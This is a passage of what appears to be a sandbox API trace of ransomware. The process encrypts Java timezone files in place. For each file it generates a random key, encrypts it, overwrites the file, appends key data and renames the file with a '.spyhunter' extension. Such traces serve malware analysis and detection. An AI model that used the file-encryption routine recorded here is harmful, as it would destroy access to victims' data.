pdwDataLen=0x57e650*=0x30) returned 1 [0168.936] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Adelaide" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\adelaide"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0168.936] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Adelaide") returned 62 [0168.936] StrStrW (lpFirst="Adelaide", lpSrch=".txt") returned 0x0 [0168.936] GetProcessHeap () returned 0x2c0000 [0168.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0168.936] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e614, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e614*=0x4c8, lpOverlapped=0x0) returned 1 [0169.078] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffb38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.078] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x4c8, lpNumberOfBytesWritten=0x57e614, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e614*=0x4c8, lpOverlapped=0x0) returned 1 [0169.078] GetProcessHeap () returned 0x2c0000 [0169.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0169.078] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.078] WriteFile (in: hFile=0x9c, lpBuffer=0x57e654*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e614, lpOverlapped=0x0 | out: lpBuffer=0x57e654*, lpNumberOfBytesWritten=0x57e614*=0x4, lpOverlapped=0x0) returned 1 [0169.078] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e614, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e614*=0x30, lpOverlapped=0x0) returned 1 [0169.078] CloseHandle (hObject=0x9c) returned 1 [0169.078] GetProcessHeap () returned 0x2c0000 [0169.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0169.078] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Adelaide.spyhunter") returned 72 [0169.078] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Adelaide" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\adelaide"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Adelaide.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\adelaide.spyhunter")) returned 1 [0169.079] GetProcessHeap () returned 0x2c0000 [0169.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0169.079] GetProcessHeap () returned 0x2c0000 [0169.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0169.079] GetProcessHeap () returned 0x2c0000 [0169.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebb628 | out: hHeap=0x2c0000) returned 1 [0169.079] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e650 | out: pbBuffer=0x57e650) returned 1 [0169.079] GetProcessHeap () returned 0x2c0000 [0169.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0169.079] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e648*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e648*=0x30) returned 1 [0169.079] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Urumqi" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\urumqi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0169.081] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Urumqi") returned 55 [0169.081] StrStrW (lpFirst="Urumqi", lpSrch=".txt") returned 0x0 [0169.082] GetProcessHeap () returned 0x2c0000 [0169.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0169.082] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e60c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e60c*=0xb5, lpOverlapped=0x0) returned 1 [0169.082] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff4b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.082] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xb5, lpNumberOfBytesWritten=0x57e60c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e60c*=0xb5, lpOverlapped=0x0) returned 1 [0169.082] GetProcessHeap () returned 0x2c0000 [0169.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0169.083] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.083] WriteFile (in: hFile=0x9c, lpBuffer=0x57e64c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e60c, lpOverlapped=0x0 | out: lpBuffer=0x57e64c*, lpNumberOfBytesWritten=0x57e60c*=0x4, lpOverlapped=0x0) returned 1 [0169.083] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e60c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e60c*=0x30, lpOverlapped=0x0) returned 1 [0169.083] CloseHandle (hObject=0x9c) returned 1 [0169.083] GetProcessHeap () returned 0x2c0000 [0169.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0169.083] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Urumqi.spyhunter") returned 65 [0169.083] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Urumqi" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\urumqi"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Urumqi.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\urumqi.spyhunter")) returned 1 [0169.084] GetProcessHeap () returned 0x2c0000 [0169.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0169.084] GetProcessHeap () returned 0x2c0000 [0169.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0169.084] GetProcessHeap () returned 0x2c0000 [0169.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f27cc8 | out: hHeap=0x2c0000) returned 1 [0169.084] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e650 | out: pbBuffer=0x57e650) returned 1 [0169.084] GetProcessHeap () returned 0x2c0000 [0169.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0169.084] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e648*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e648*=0x30) returned 1 [0169.084] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ulaanbaatar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\ulaanbaatar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0169.084] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ulaanbaatar") returned 60 [0169.084] StrStrW (lpFirst="Ulaanbaatar", lpSrch=".txt") returned 0x0 [0169.084] GetProcessHeap () returned 0x2c0000 [0169.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0169.085] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e60c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e60c*=0x1b5, lpOverlapped=0x0) returned 1 [0169.085] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffe4b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.133] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1b5, lpNumberOfBytesWritten=0x57e60c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e60c*=0x1b5, lpOverlapped=0x0) returned 1 [0169.133] GetProcessHeap () returned 0x2c0000 [0169.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0169.134] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.134] WriteFile (in: hFile=0x9c, lpBuffer=0x57e64c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e60c, lpOverlapped=0x0 | out: lpBuffer=0x57e64c*, lpNumberOfBytesWritten=0x57e60c*=0x4, lpOverlapped=0x0) returned 1 [0169.134] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e60c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e60c*=0x30, lpOverlapped=0x0) returned 1 [0169.134] CloseHandle (hObject=0x9c) returned 1 [0169.141] GetProcessHeap () returned 0x2c0000 [0169.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0169.141] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ulaanbaatar.spyhunter") returned 70 [0169.141] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ulaanbaatar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\ulaanbaatar"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ulaanbaatar.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\ulaanbaatar.spyhunter")) returned 1 [0169.208] GetProcessHeap () returned 0x2c0000 [0169.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0169.208] GetProcessHeap () returned 0x2c0000 [0169.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0169.208] GetProcessHeap () returned 0x2c0000 [0169.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebb0b0 | out: hHeap=0x2c0000) returned 1 [0169.208] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e648 | out: pbBuffer=0x57e648) returned 1 [0169.208] GetProcessHeap () returned 0x2c0000 [0169.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0169.208] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e640*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e640*=0x30) returned 1 [0169.208] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh89" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\riyadh89"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0169.209] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh89") returned 57 [0169.209] StrStrW (lpFirst="Riyadh89", lpSrch=".txt") returned 0x0 [0169.209] GetProcessHeap () returned 0x2c0000 [0169.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0169.209] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e604, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e604*=0x129d, lpOverlapped=0x0) returned 1 [0169.487] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffed63, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.487] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x129d, lpNumberOfBytesWritten=0x57e604, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e604*=0x129d, lpOverlapped=0x0) returned 1 [0169.487] GetProcessHeap () returned 0x2c0000 [0169.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0169.488] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.488] WriteFile (in: hFile=0xb0, lpBuffer=0x57e644*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e604, lpOverlapped=0x0 | out: lpBuffer=0x57e644*, lpNumberOfBytesWritten=0x57e604*=0x4, lpOverlapped=0x0) returned 1 [0169.488] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e604, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e604*=0x30, lpOverlapped=0x0) returned 1 [0169.488] CloseHandle (hObject=0xb0) returned 1 [0169.488] GetProcessHeap () returned 0x2c0000 [0169.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.488] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh89.spyhunter") returned 67 [0169.488] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh89" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\riyadh89"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh89.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\riyadh89.spyhunter")) returned 1 [0169.489] GetProcessHeap () returned 0x2c0000 [0169.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.489] GetProcessHeap () returned 0x2c0000 [0169.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0169.489] GetProcessHeap () returned 0x2c0000 [0169.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebd100 | out: hHeap=0x2c0000) returned 1 [0169.489] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e648 | out: pbBuffer=0x57e648) returned 1 [0169.489] GetProcessHeap () returned 0x2c0000 [0169.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0169.489] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e640*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e640*=0x30) returned 1 [0169.489] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Hebron" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\hebron"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0169.490] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Hebron") returned 55 [0169.490] StrStrW (lpFirst="Hebron", lpSrch=".txt") returned 0x0 [0169.490] GetProcessHeap () returned 0x2c0000 [0169.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0169.490] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e604, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e604*=0x4e4, lpOverlapped=0x0) returned 1 [0169.554] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffb1c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.554] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x4e4, lpNumberOfBytesWritten=0x57e604, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e604*=0x4e4, lpOverlapped=0x0) returned 1 [0169.554] GetProcessHeap () returned 0x2c0000 [0169.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0169.554] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.554] WriteFile (in: hFile=0xb0, lpBuffer=0x57e644*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e604, lpOverlapped=0x0 | out: lpBuffer=0x57e644*, lpNumberOfBytesWritten=0x57e604*=0x4, lpOverlapped=0x0) returned 1 [0169.554] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e604, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e604*=0x30, lpOverlapped=0x0) returned 1 [0169.554] CloseHandle (hObject=0xb0) returned 1 [0169.554] GetProcessHeap () returned 0x2c0000 [0169.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.554] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Hebron.spyhunter") returned 65 [0169.554] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Hebron" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\hebron"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Hebron.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\hebron.spyhunter")) returned 1 [0169.563] GetProcessHeap () returned 0x2c0000 [0169.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.563] GetProcessHeap () returned 0x2c0000 [0169.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0169.563] GetProcessHeap () returned 0x2c0000 [0169.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f27200 | out: hHeap=0x2c0000) returned 1 [0169.563] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e640 | out: pbBuffer=0x57e640) returned 1 [0169.563] GetProcessHeap () returned 0x2c0000 [0169.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0169.563] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e638*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e638*=0x30) returned 1 [0169.563] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dubai" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\dubai"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0169.615] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dubai") returned 54 [0169.615] StrStrW (lpFirst="Dubai", lpSrch=".txt") returned 0x0 [0169.615] GetProcessHeap () returned 0x2c0000 [0169.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.615] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e5fc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e5fc*=0x41, lpOverlapped=0x0) returned 1 [0169.616] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.616] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x57e5fc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e5fc*=0x41, lpOverlapped=0x0) returned 1 [0169.617] GetProcessHeap () returned 0x2c0000 [0169.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.617] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.617] WriteFile (in: hFile=0xa0, lpBuffer=0x57e63c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e5fc, lpOverlapped=0x0 | out: lpBuffer=0x57e63c*, lpNumberOfBytesWritten=0x57e5fc*=0x4, lpOverlapped=0x0) returned 1 [0169.617] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e5fc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e5fc*=0x30, lpOverlapped=0x0) returned 1 [0169.617] CloseHandle (hObject=0xa0) returned 1 [0169.617] GetProcessHeap () returned 0x2c0000 [0169.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.617] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dubai.spyhunter") returned 64 [0169.617] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dubai" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\dubai"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dubai.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\dubai.spyhunter")) returned 1 [0169.618] GetProcessHeap () returned 0x2c0000 [0169.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.618] GetProcessHeap () returned 0x2c0000 [0169.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0169.618] GetProcessHeap () returned 0x2c0000 [0169.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f26fd8 | out: hHeap=0x2c0000) returned 1 [0169.619] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e640 | out: pbBuffer=0x57e640) returned 1 [0169.619] GetProcessHeap () returned 0x2c0000 [0169.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0169.619] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e638*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e638*=0x30) returned 1 [0169.619] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Choibalsan" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\choibalsan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0169.620] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Choibalsan") returned 59 [0169.620] StrStrW (lpFirst="Choibalsan", lpSrch=".txt") returned 0x0 [0169.620] GetProcessHeap () returned 0x2c0000 [0169.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.620] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e5fc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e5fc*=0x1c1, lpOverlapped=0x0) returned 1 [0169.621] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffe3f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.621] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1c1, lpNumberOfBytesWritten=0x57e5fc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e5fc*=0x1c1, lpOverlapped=0x0) returned 1 [0169.621] GetProcessHeap () returned 0x2c0000 [0169.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.621] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.621] WriteFile (in: hFile=0xa0, lpBuffer=0x57e63c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e5fc, 